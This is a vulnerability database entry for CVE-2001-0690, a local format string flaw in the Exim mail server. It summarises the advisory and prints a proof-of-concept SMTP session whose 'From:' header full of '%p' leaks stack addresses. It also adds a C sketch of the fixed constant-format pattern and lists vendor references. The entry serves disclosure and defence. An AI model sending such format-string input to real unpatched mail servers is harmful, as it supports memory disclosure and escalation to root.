Exim Format String Overflow Vulnerability

Vulnerability ID: 1106371    Vulnerability type: Input validation
Published: 2001-06-06    Updated: 2005-05-02
CVE ID: CVE-2001-0690
CNNVD-ID: CNNVD-200109-092
Platform: Linux    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/20900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-092
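|Vulnerability details
CVE (CAN) ID: CVE-2001-0690. Exim is free, open-source software that provides mail transfer agent (MTA) functionality on Unix. Exim contains a format string overflow vulnerability that may allow a local attacker to gain root privileges. If Exim's "syntax checking" option is enabled (it is off by default), the vulnerability is triggered when the "From:" address field of a message contains a format string. An attacker can modify arbitrary memory addresses and gain root privileges.
|Exploit (EXP)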
source: http://www.securityfocus.com/bid/2828/info

Exim is a free, open-source Mail Transfer Agent for Unix systems.

Exim is vulnerable to a locally exploitable format string attack which may compromise root access. The vulnerability exists only when the 'syntax checking' mode is turned on, which it is not by default.

The vulnerability has to do with handling of the hostname string in an email address supplied in the 'From:' field. If syntax checking is enabled, this vulnerability can be exploited to execute arbitrary code with root privileges.

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
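
As an added illustration (not part of the original advisory and not Exim's source), the C sketch below shows the hardened pattern for this class of bug, a constant format string with the address passed as data, plus a helper that counts conversion specifications in untrusted text. The names `report_syntax_error` and `count_format_specs` are hypothetical, and the message text is shortened from the reply shown above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical error reporter, NOT Exim's code. The vulnerable pattern passes
 * text containing the untrusted address as the format argument itself:
 *     snprintf(out, outlen, msg);
 * The hardened form keeps the format constant and passes the address as data. */
int report_syntax_error(char *out, size_t outlen, const char *addr)
{
    return snprintf(out, outlen,
                    "550 Syntax error in 'From' header: failing address is: %s",
                    addr);
}

/* Count printf-style conversion specifications in untrusted text, for triage
 * of headers or logs. "%%" is a literal percent sign and is not counted. */
int count_format_specs(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }
        const char *p = s + 1;
        while (*p && strchr("-+ #0", *p)) p++;                 /* flags */
        while (*p && (isdigit((unsigned char)*p) || strchr("*.$", *p)))
            p++;                                               /* width, precision, n$ */
        while (*p && strchr("hlLqjzt", *p)) p++;               /* length modifiers */
        if (*p && strchr("diouxXeEfFgGaAcspn", *p)) { n++; s = p; }
    }
    return n;
}

int main(void)
{
    /* Constructed input: the From: value shown in the session above. */
    const char *from = "@@%p%p%p%p%p%p%p%p%p%p";
    char line[256];
    report_syntax_error(line, sizeof line, from);
    printf("%s\n(%d conversion specifications in header)\n",
           line, count_format_specs(from));
    return 0;
}
```

With the hardened reporter the `%p` sequences come back verbatim in the reply instead of being expanded into stack contents.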
|References

Source: REDHAT
Name: RHSA-2001:078
Link: http://www.redhat.com/support/errata/RHSA-2001-078.html
Source: DEBIAN
Name: DSA-058
Link: http://www.debian.org/security/2001/dsa-058
Source: BUGTRAQ
Name: 20010606 lil' exim format bug
Link: http://archives.neohapsis.com/archives/bugtraq/2001-06/0041.html
Source: XF
Name: exim-syntax-format-string(6671)
Link: http://xforce.iss.net/static/6671.php
Source: BID
Name: 2828
Link: http://www.securityfocus.com/bid/2828
Source: CONECTIVA
Name: CLA-2001:402
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000402
